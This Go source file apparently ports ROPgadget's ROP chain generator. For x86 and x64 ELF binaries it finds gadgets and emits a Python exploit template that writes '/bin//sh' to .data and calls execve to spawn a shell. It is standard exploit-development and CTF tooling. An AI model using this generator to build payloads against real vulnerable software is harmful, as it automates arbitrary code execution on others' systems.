package ropgadget

import (
	"fmt"
	"regexp"
	"strings"

	capstone "github.com/moloch--/go-capstone"
)

func GenerateROPChain(bin *LoadedBinary, gadgets []Gadget, offset uint64) string {
	if bin.Arch != capstone.ArchX86 {
		// keep the same visible behavior as the Python implementation
		return "\n[Error] ROPMaker.__handlerArch - Arch not supported yet for the rop chain generation\n"
	}
	if bin.Format != "ELF" {
		return "\n[Error] ROPMaker.__handlerArch - Arch not supported yet for the rop chain generation\n"
	}

	if bin.Mode == capstone.Mode32 {
		return generateX86ROPChain(bin, gadgets, offset)
	}
	if bin.Mode == capstone.Mode64 {
		return generateX64ROPChain(bin, gadgets, offset)
	}
	return "\n[Error] ROPMaker.__handlerArch - Arch not supported yet for the rop chain generation\n"
}

func generateX86ROPChain(bin *LoadedBinary, gadgets []Gadget, offset uint64) string {
	var builder strings.Builder
	builder.WriteString("\nROP chain generation\n===========================================================\n")
	builder.WriteString("\n- Step 1 -- Write-what-where gadgets\n\n")

	writeRe := regexp.MustCompile(`^mov dword ptr \[(eax|ebx|ecx|edx|esi|edi)\], (eax|ebx|ecx|edx|esi|edi)$`)
	write, popDst, popSrc, xorSrc, dst, _ := findX86WriteSequence(gadgets, writeRe)
	if write == nil {
		builder.WriteString("\t[-] Can't find the 'mov dword ptr [r32], r32' gadget\n")
		return builder.String()
	}

	builder.WriteString(formatFound(write))
	builder.WriteString(formatFound(popDst))
	builder.WriteString(formatFound(popSrc))
	builder.WriteString(formatFound(xorSrc))

	builder.WriteString("\n- Step 2 -- Init syscall number gadgets\n\n")
	xorEax := findSimpleGadget(gadgets, "xor eax, eax")
	if xorEax == nil {
		builder.WriteString("\t[-] Can't find the 'xor eax, eax' instruction\n")
		return builder.String()
	}
	incEax := findSimpleGadget(gadgets, "inc eax")
	if incEax == nil {
		builder.WriteString("\t[-] Can't find the 'inc eax' instruction\n")
		return builder.String()
	}
	builder.WriteString(formatFound(xorEax))
	builder.WriteString(formatFound(incEax))

	builder.WriteString("\n- Step 3 -- Init syscall arguments gadgets\n\n")
	popEbx := findSimpleGadget(gadgets, "pop ebx")
	popEcx := findSimpleGadget(gadgets, "pop ecx")
	popEdx := findSimpleGadget(gadgets, "pop edx")
	if popEbx == nil || popEcx == nil || popEdx == nil {
		if popEbx == nil {
			builder.WriteString("\t[-] Can't find the 'pop ebx' instruction\n")
		}
		if popEcx == nil {
			builder.WriteString("\t[-] Can't find the 'pop ecx' instruction\n")
		}
		if popEdx == nil {
			builder.WriteString("\t[-] Can't find the 'pop edx' instruction\n")
		}
		return builder.String()
	}
	builder.WriteString(formatFound(popEbx))
	builder.WriteString(formatFound(popEcx))
	builder.WriteString(formatFound(popEdx))

	builder.WriteString("\n- Step 4 -- Syscall gadget\n\n")
	syscall := findSimpleGadget(gadgets, "int 0x80")
	if syscall == nil {
		builder.WriteString("\t[-] Can't find the 'syscall' instruction\n")
		return builder.String()
	}
	builder.WriteString(formatFound(syscall))

	builder.WriteString("\n- Step 5 -- Build the ROP chain\n\n")
	dataAddr := writableDataAddress(bin, offset)
	if dataAddr == 0 {
		builder.WriteString("\n[-] Error - Can't find a writable section\n")
		return builder.String()
	}

	builder.WriteString("#!/usr/bin/env python3\n")
	builder.WriteString("# execve generated by ROPgadget\n\n")
	builder.WriteString("from struct import pack\n\n")
	builder.WriteString("# Padding goes here\n")
	builder.WriteString("p = b''\n\n")
	builder.WriteString(fmt.Sprintf("p += pack('<I', 0x%08x) # %s\n", popDst.Vaddr, popDst.Text))
	builder.WriteString(fmt.Sprintf("p += pack('<I', 0x%08x) # @ .data\n", dataAddr))
	builder.WriteString(padding32(popDst, map[string]uint32{}))
	builder.WriteString(fmt.Sprintf("p += pack('<I', 0x%08x) # %s\n", popSrc.Vaddr, popSrc.Text))
	builder.WriteString("p += b'/bin'\n")
	builder.WriteString(padding32(popSrc, map[string]uint32{dst: uint32(dataAddr)}))
	builder.WriteString(fmt.Sprintf("p += pack('<I', 0x%08x) # %s\n", write.Vaddr, write.Text))
	builder.WriteString(padding32(write, map[string]uint32{}))
	builder.WriteString(fmt.Sprintf("p += pack('<I', 0x%08x) # %s\n", popDst.Vaddr, popDst.Text))
	builder.WriteString(fmt.Sprintf("p += pack('<I', 0x%08x) # @ .data + 4\n", dataAddr+4))
	builder.WriteString(padding32(popDst, map[string]uint32{}))
	builder.WriteString(fmt.Sprintf("p += pack('<I', 0x%08x) # %s\n", popSrc.Vaddr, popSrc.Text))
	builder.WriteString("p += b'//sh'\n")
	builder.WriteString(padding32(popSrc, map[string]uint32{dst: uint32(dataAddr + 4)}))
	builder.WriteString(fmt.Sprintf("p += pack('<I', 0x%08x) # %s\n", write.Vaddr, write.Text))
	builder.WriteString(padding32(write, map[string]uint32{}))
	builder.WriteString(fmt.Sprintf("p += pack('<I', 0x%08x) # %s\n", popDst.Vaddr, popDst.Text))
	builder.WriteString(fmt.Sprintf("p += pack('<I', 0x%08x) # @ .data + 8\n", dataAddr+8))
	builder.WriteString(padding32(popDst, map[string]uint32{}))
	builder.WriteString(fmt.Sprintf("p += pack('<I', 0x%08x) # %s\n", xorSrc.Vaddr, xorSrc.Text))
	builder.WriteString(padding32(xorSrc, map[string]uint32{}))
	builder.WriteString(fmt.Sprintf("p += pack('<I', 0x%08x) # %s\n", write.Vaddr, write.Text))
	builder.WriteString(padding32(write, map[string]uint32{}))
	builder.WriteString(fmt.Sprintf("p += pack('<I', 0x%08x) # %s\n", popEbx.Vaddr, popEbx.Text))
	builder.WriteString(fmt.Sprintf("p += pack('<I', 0x%08x) # @ .data\n", dataAddr))
	builder.WriteString(padding32(popEbx, map[string]uint32{}))
	builder.WriteString(fmt.Sprintf("p += pack('<I', 0x%08x) # %s\n", popEcx.Vaddr, popEcx.Text))
	builder.WriteString(fmt.Sprintf("p += pack('<I', 0x%08x) # @ .data + 8\n", dataAddr+8))
	builder.WriteString(padding32(popEcx, map[string]uint32{"ebx": uint32(dataAddr)}))
	builder.WriteString(fmt.Sprintf("p += pack('<I', 0x%08x) # %s\n", popEdx.Vaddr, popEdx.Text))
	builder.WriteString(fmt.Sprintf("p += pack('<I', 0x%08x) # @ .data + 8\n", dataAddr+8))
	builder.WriteString(padding32(popEdx, map[string]uint32{"ebx": uint32(dataAddr), "ecx": uint32(dataAddr + 8)}))
	builder.WriteString(fmt.Sprintf("p += pack('<I', 0x%08x) # %s\n", xorEax.Vaddr, xorEax.Text))
	builder.WriteString(padding32(xorEax, map[string]uint32{"ebx": uint32(dataAddr), "ecx": uint32(dataAddr + 8)}))
	for range 11 {
		builder.WriteString(fmt.Sprintf("p += pack('<I', 0x%08x) # %s\n", incEax.Vaddr, incEax.Text))
		builder.WriteString(padding32(incEax, map[string]uint32{"ebx": uint32(dataAddr), "ecx": uint32(dataAddr + 8)}))
	}
	builder.WriteString(fmt.Sprintf("p += pack('<I', 0x%08x) # %s\n", syscall.Vaddr, syscall.Text))
	return builder.String()
}

func generateX64ROPChain(bin *LoadedBinary, gadgets []Gadget, offset uint64) string {
	var builder strings.Builder
	builder.WriteString("\nROP chain generation\n===========================================================\n")
	builder.WriteString("\n- Step 1 -- Write-what-where gadgets\n\n")
	writeRe := regexp.MustCompile(`^mov .* ptr \[(rax|rbx|rcx|rdx|rsi|rdi|r9|r10|r11|r12|r13|r14|r15)\], (rax|rbx|rcx|rdx|rsi|rdi|r9|r10|r11|r12|r13|r14|r15)$`)
	write, popDst, popSrc, xorSrc, dst, _ := findX64WriteSequence(gadgets, writeRe)
	if write == nil {
		builder.WriteString("\t[-] Can't find the 'mov qword ptr [r64], r64' gadget\n")
		return builder.String()
	}
	builder.WriteString(formatFound(write))
	builder.WriteString(formatFound(popDst))
	builder.WriteString(formatFound(popSrc))
	builder.WriteString(formatFound(xorSrc))

	builder.WriteString("\n- Step 2 -- Init syscall number gadgets\n\n")
	xorRax := findSimpleGadget(gadgets, "xor rax, rax")
	incRax := firstNonNil(
		findSimpleGadget(gadgets, "inc rax"),
		findSimpleGadget(gadgets, "inc eax"),
		findSimpleGadget(gadgets, "inc al"),
		findSimpleGadget(gadgets, "add rax, 1"),
		findSimpleGadget(gadgets, "add eax, 1"),
		findSimpleGadget(gadgets, "add al, 1"),
	)
	if xorRax == nil || incRax == nil {
		if xorRax == nil {
			builder.WriteString("\t[-] Can't find the 'xor rax, rax' instruction\n")
		}
		if incRax == nil {
			builder.WriteString("\t[-] Can't find the 'inc rax' or 'add rax, 1' instruction\n")
		}
		return builder.String()
	}
	builder.WriteString(formatFound(xorRax))
	builder.WriteString(formatFound(incRax))

	builder.WriteString("\n- Step 3 -- Init syscall arguments gadgets\n\n")
	popRdi := findSimpleGadget(gadgets, "pop rdi")
	popRsi := findSimpleGadget(gadgets, "pop rsi")
	popRdx := findSimpleGadget(gadgets, "pop rdx")
	if popRdi == nil || popRsi == nil || popRdx == nil {
		if popRdi == nil {
			builder.WriteString("\t[-] Can't find the 'pop rdi' instruction\n")
		}
		if popRsi == nil {
			builder.WriteString("\t[-] Can't find the 'pop rsi' instruction\n")
		}
		if popRdx == nil {
			builder.WriteString("\t[-] Can't find the 'pop rdx' instruction\n")
		}
		return builder.String()
	}
	builder.WriteString(formatFound(popRdi))
	builder.WriteString(formatFound(popRsi))
	builder.WriteString(formatFound(popRdx))

	builder.WriteString("\n- Step 4 -- Syscall gadget\n\n")
	syscall := findSimpleGadget(gadgets, "syscall")
	if syscall == nil {
		builder.WriteString("\t[-] Can't find the 'syscall' instruction\n")
		return builder.String()
	}
	builder.WriteString(formatFound(syscall))

	builder.WriteString("\n- Step 5 -- Build the ROP chain\n\n")
	dataAddr := writableDataAddress(bin, offset)
	if dataAddr == 0 {
		builder.WriteString("\n[-] Error - Can't find a writable section\n")
		return builder.String()
	}

	builder.WriteString("#!/usr/bin/env python3\n")
	builder.WriteString("# execve generated by ROPgadget\n\n")
	builder.WriteString("from struct import pack\n\n")
	builder.WriteString("# Padding goes here\n")
	builder.WriteString("p = b''\n\n")
	builder.WriteString(fmt.Sprintf("p += pack('<Q', 0x%016x) # %s\n", popDst.Vaddr, popDst.Text))
	builder.WriteString(fmt.Sprintf("p += pack('<Q', 0x%016x) # @ .data\n", dataAddr))
	builder.WriteString(padding64(popDst, map[string]uint64{}))
	builder.WriteString(fmt.Sprintf("p += pack('<Q', 0x%016x) # %s\n", popSrc.Vaddr, popSrc.Text))
	builder.WriteString("p += b'/bin//sh'\n")
	builder.WriteString(padding64(popSrc, map[string]uint64{dst: dataAddr}))
	builder.WriteString(fmt.Sprintf("p += pack('<Q', 0x%016x) # %s\n", write.Vaddr, write.Text))
	builder.WriteString(padding64(write, map[string]uint64{}))
	builder.WriteString(fmt.Sprintf("p += pack('<Q', 0x%016x) # %s\n", popDst.Vaddr, popDst.Text))
	builder.WriteString(fmt.Sprintf("p += pack('<Q', 0x%016x) # @ .data + 8\n", dataAddr+8))
	builder.WriteString(padding64(popDst, map[string]uint64{}))
	builder.WriteString(fmt.Sprintf("p += pack('<Q', 0x%016x) # %s\n", xorSrc.Vaddr, xorSrc.Text))
	builder.WriteString(padding64(xorSrc, map[string]uint64{}))
	builder.WriteString(fmt.Sprintf("p += pack('<Q', 0x%016x) # %s\n", write.Vaddr, write.Text))
	builder.WriteString(padding64(write, map[string]uint64{}))
	builder.WriteString(fmt.Sprintf("p += pack('<Q', 0x%016x) # %s\n", popRdi.Vaddr, popRdi.Text))
	builder.WriteString(fmt.Sprintf("p += pack('<Q', 0x%016x) # @ .data\n", dataAddr))
	builder.WriteString(padding64(popRdi, map[string]uint64{}))
	builder.WriteString(fmt.Sprintf("p += pack('<Q', 0x%016x) # %s\n", popRsi.Vaddr, popRsi.Text))
	builder.WriteString(fmt.Sprintf("p += pack('<Q', 0x%016x) # @ .data + 8\n", dataAddr+8))
	builder.WriteString(padding64(popRsi, map[string]uint64{"rdi": dataAddr}))
	builder.WriteString(fmt.Sprintf("p += pack('<Q', 0x%016x) # %s\n", popRdx.Vaddr, popRdx.Text))
	builder.WriteString(fmt.Sprintf("p += pack('<Q', 0x%016x) # @ .data + 8\n", dataAddr+8))
	builder.WriteString(padding64(popRdx, map[string]uint64{"rdi": dataAddr, "rsi": dataAddr + 8}))
	builder.WriteString(fmt.Sprintf("p += pack('<Q', 0x%016x) # %s\n", xorRax.Vaddr, xorRax.Text))
	builder.WriteString(padding64(xorRax, map[string]uint64{"rdi": dataAddr, "rsi": dataAddr + 8}))
	for range 59 {
		builder.WriteString(fmt.Sprintf("p += pack('<Q', 0x%016x) # %s\n", incRax.Vaddr, incRax.Text))
		builder.WriteString(padding64(incRax, map[string]uint64{"rdi": dataAddr, "rsi": dataAddr + 8}))
	}
	builder.WriteString(fmt.Sprintf("p += pack('<Q', 0x%016x) # %s\n", syscall.Vaddr, syscall.Text))
	return builder.String()
}

func findWriteWhere(gadgets []Gadget, re *regexp.Regexp) (*Gadget, string, string) {
	for i := len(gadgets) - 1; i >= 0; i-- {
		parts := strings.Split(gadgets[i].Text, " ; ")
		if len(parts) == 0 {
			continue
		}
		match := re.FindStringSubmatch(parts[0])
		if len(match) != 3 {
			continue
		}
		if !simplePopRetTail(parts[1:]) {
			continue
		}
		return &gadgets[i], match[1], match[2]
	}
	return nil, "", ""
}

func findX86WriteSequence(gadgets []Gadget, re *regexp.Regexp) (*Gadget, *Gadget, *Gadget, *Gadget, string, string) {
	for i := len(gadgets) - 1; i >= 0; i-- {
		parts := strings.Split(gadgets[i].Text, " ; ")
		if len(parts) == 0 {
			continue
		}
		match := re.FindStringSubmatch(parts[0])
		if len(match) != 3 || !simplePopRetTail(parts[1:]) {
			continue
		}
		dst := match[1]
		src := match[2]
		popDst := findSimpleGadget(gadgets, "pop "+dst)
		if popDst == nil {
			continue
		}
		popSrc := findSimpleGadget(gadgets, "pop "+src)
		if popSrc == nil {
			continue
		}
		xorSrc := findSimpleGadget(gadgets, fmt.Sprintf("xor %s, %s", src, src))
		if xorSrc == nil {
			continue
		}
		return &gadgets[i], popDst, popSrc, xorSrc, dst, src
	}
	return nil, nil, nil, nil, "", ""
}

func findX64WriteSequence(gadgets []Gadget, re *regexp.Regexp) (*Gadget, *Gadget, *Gadget, *Gadget, string, string) {
	for i := len(gadgets) - 1; i >= 0; i-- {
		parts := strings.Split(gadgets[i].Text, " ; ")
		if len(parts) == 0 {
			continue
		}
		match := re.FindStringSubmatch(parts[0])
		if len(match) != 3 || !simplePopRetTail(parts[1:]) {
			continue
		}
		dst := match[1]
		src := match[2]
		popDst := findSimpleGadget(gadgets, "pop "+dst)
		if popDst == nil {
			continue
		}
		popSrc := findSimpleGadget(gadgets, "pop "+src)
		if popSrc == nil {
			continue
		}
		xorSrc := findSimpleGadget(gadgets, fmt.Sprintf("xor %s, %s", src, src))
		if xorSrc == nil {
			continue
		}
		return &gadgets[i], popDst, popSrc, xorSrc, dst, src
	}
	return nil, nil, nil, nil, "", ""
}

func findSimpleGadget(gadgets []Gadget, prefix string) *Gadget {
	for i := len(gadgets) - 1; i >= 0; i-- {
		parts := strings.Split(gadgets[i].Text, " ; ")
		if len(parts) == 0 || parts[0] != prefix {
			continue
		}
		if !simplePopRetTail(parts[1:]) {
			continue
		}
		return &gadgets[i]
	}
	return nil
}

func simplePopRetTail(parts []string) bool {
	for _, part := range parts {
		fields := strings.Fields(part)
		if len(fields) == 0 {
			return false
		}
		switch fields[0] {
		case "pop":
		case "ret":
			if part != "ret" && len(fields) > 1 {
				return false
			}
		default:
			return false
		}
	}
	return true
}

func formatFound(g *Gadget) string {
	if g == nil {
		return ""
	}
	return fmt.Sprintf("\t[+] Gadget found: 0x%x %s\n", g.Vaddr, g.Text)
}

func writableDataAddress(bin *LoadedBinary, offset uint64) uint64 {
	for _, section := range bin.DataSections {
		if section.Name == ".data" {
			return section.Vaddr + offset
		}
	}
	return 0
}

func padding32(g *Gadget, locked map[string]uint32) string {
	var builder strings.Builder
	for _, part := range strings.Split(g.Text, " ; ")[1:] {
		fields := strings.Fields(part)
		if len(fields) == 2 && fields[0] == "pop" {
			if value, ok := locked[fields[1]]; ok {
				builder.WriteString(fmt.Sprintf("\tp += pack('<I', 0x%08x) # padding without overwrite %s\n", value, fields[1]))
			} else {
				builder.WriteString("\tp += pack('<I', 0x41414141) # padding\n")
			}
		}
	}
	return builder.String()
}

func padding64(g *Gadget, locked map[string]uint64) string {
	var builder strings.Builder
	for _, part := range strings.Split(g.Text, " ; ")[1:] {
		fields := strings.Fields(part)
		if len(fields) == 2 && fields[0] == "pop" {
			if value, ok := locked[fields[1]]; ok {
				builder.WriteString(fmt.Sprintf("\tp += pack('<Q', 0x%016x) # padding without overwrite %s\n", value, fields[1]))
			} else {
				builder.WriteString("\tp += pack('<Q', 0x4141414141414141) # padding\n")
			}
		}
	}
	return builder.String()
}

func firstNonNil[T any](values ...*T) *T {
	for _, value := range values {
		if value != nil {
			return value
		}
	}
	return nil
}
